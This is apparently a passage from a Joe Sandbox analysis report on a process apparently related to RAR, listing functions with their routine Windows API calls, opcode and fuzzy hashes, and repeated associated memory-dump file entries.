Instruction Fuzzy Hash: B501D700F0D1E395FA18B3B65462BB9A443BF95330FD88178E52D4B2D3DD9C24528375

Function 00007FF74EE92440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF74EE92480
GetLastError.KERNEL32 ref: 00007FF74EE9248D

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: f9e59cbeeb972e274beba33c2adc0c2e02c62c9ccd4bf6e78e448ae8d3157cb4
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: 0D013C21A0CA92D1FF64BB29F4442A8A3A0BB45778F944731D17D461E6CFACD58AC760

Function 00007FF74EE930C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000800,00007FF74EE9305D,?,?,?,?,?,?,?,?,00007FF74EEA4126,?,?,?,?,00000800), ref: 00007FF74EE930F0
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF74EEA4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF74EE93119

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction ID: f6d282e7306c1abfcc28bc05f472288ef021ae408ad8b357537f75626615d2b1
Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction Fuzzy Hash: 32F0AF21B1CA91C1FA60BB25F4543B9A290BB4D7F4FC00130EADD87BA9CFACD5848A10

Function 00007FF74EEBB3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF74EEB7F72), ref: 00007FF74EEBB41E
LoadLibraryExW.KERNELBASE ref: 00007FF74EEBB449

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: 89ccd15b9ce80808f39fc7161a4d8625bafcd838561eb497dba39f35e6f4365e
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: 76F06221B2C591C6F670BB20F8153FAB264BF88794FC04031E9CD86699EFACD2448A20

Function 00007FF74EEBBA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF74EEBBACD), ref: 00007FF74EEBBA74
GetProcessAffinityMask.KERNEL32 ref: 00007FF74EEBBA87

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction ID: 48a45bb72e7a7dc2c9e6ab1494d412fad68611ef40eb4409760867748e2cd312
Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction Fuzzy Hash: B7E0E521B3846186EBE8B7198495FA96390BF44B80FC02035E44A83A14DE5CC5448B10

Function 00007FF74EED4A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF74EED4A8A
GetLastError.KERNEL32 ref: 00007FF74EED4A9C

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction ID: ba67587933355c8dd6bfb58b65fc5e06827d1b50bc3a37a3aef921b32fc8632d
Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction Fuzzy Hash: 97E08661F1D523C2FF04B7F25405574E2D17F58760F884030DD1D4A291EEAC68414634

Function 00007FF74EEB71FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
Instruction ID: 51676a87002884d615ed2ed217675d6cf7d04a18ba3494759e130192050cbc38
Opcode Fuzzy Hash: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
Instruction Fuzzy Hash: D2E1D621A0C6A2C9FB20FB2494542BEA751FF41BA8F844335DECD0BBD6DEAD9455C720

Function 00007FF74EE772C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74EEA915C: new.LIBCMT ref: 00007FF74EEA91CA
Part of subcall function 00007FF74EEA915C: new.LIBCMT ref: 00007FF74EEA91F2

new.LIBCMT ref: 00007FF74EE773DE

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c86521b1d8875bcba69ce37d260f22ca13c49f0672248d2e89784453983af802
Instruction ID: 2220790a54460c3e9fd42a03d6d07f4376064a16590cb4765b0c45e63ebe797f
Opcode Fuzzy Hash: c86521b1d8875bcba69ce37d260f22ca13c49f0672248d2e89784453983af802
Instruction Fuzzy Hash: BF513672518BE195E701AF34A8441ED37A8FB44F98F58423ADF880B79ADF7950A2C331

Function 00007FF74EED231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF74EED2344

Part of subcall function 00007FF74EED24D4: GetModuleHandleExW.KERNEL32 ref: 00007FF74EED24F4
Part of subcall function 00007FF74EED24D4: GetProcAddress.KERNEL32 ref: 00007FF74EED250A
Part of subcall function 00007FF74EED24D4: FreeLibrary.KERNEL32 ref: 00007FF74EED252F

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 4c7b2a2df69114b0e0732b9d9881eede9e01bf6a5ba2812d86b1724e3aa1ebb4
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: 8B41B221A0D663C2FB69BB18A45067CE251FF98760FC94436D92D4BAD2DEBCE8448760

Function 00007FF74EE84D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00007FF74EE84D47

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction ID: bc746466aeeea93a8a85eff88613f69551265ea9f1b14405a8d4698843a7dc86
Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction Fuzzy Hash: 3901961260CA92C5FA10F756A4101BDD6A0FF85BA4FC80432EE4D073A9DFBDD4418320

Function 00007FF74EED4B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction ID: 51851342c05201f1d163d9d082955e90d483758b515faa48e81d9f61f446204c
Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction Fuzzy Hash: 7B012C51A0C663C4FA65B766AA40E79E1917F74BF4FCC8230ED3D862D6FDADA4014230

Function 00007FF74EEBA924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE ref: 00007FF74EEBA998

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction ID: a68233c1bc34f3f5d02abb87c2e3404a1c0c0e79794d5b2bab039a4d7567a62e
Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction Fuzzy Hash: C4018F61B0C6A2C5FA10BB06A40407AE610BB89FE0F9C4934EFCD4BB5ACEBDD0424714

Function 00007FF74EE94554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 00007FF74EE94590

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
Instruction ID: af10a61056ab6a59483e701a14d8d0fc94bcb3e77cf21ff5f802b676e094ccb1
Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
Instruction Fuzzy Hash: FEF06D6190C6D1C6EB11BBA591412F8A690BB06BB9F984335DEBC0B2D7CEA895848730

Function 00007FF74EED4AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF74EED4AF2

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction ID: 75286a07c25c419712850f287310eceb4789bc5bd83d3ebb9d61c18df57b9dfb
Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction Fuzzy Hash: C9F0FE11B4D267C1FA647BA15941AB5E2916F647B0FCC1630FD3E852C1FEDCE8514534

Function 00007FF74EEA38A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: 8e1e8bf2303a8f1bc2c7284ca02a93f429c819097a1e4ed9d5733d20aae6b455
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: ACE0B660F1D326C2FD693B62685107D82403F6ABA1E99643DCC1E4A7C2DD9EA4A95720

Function 00007FF74EEDFA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF74EEDFA20

Memory Dump Source

Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true

Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
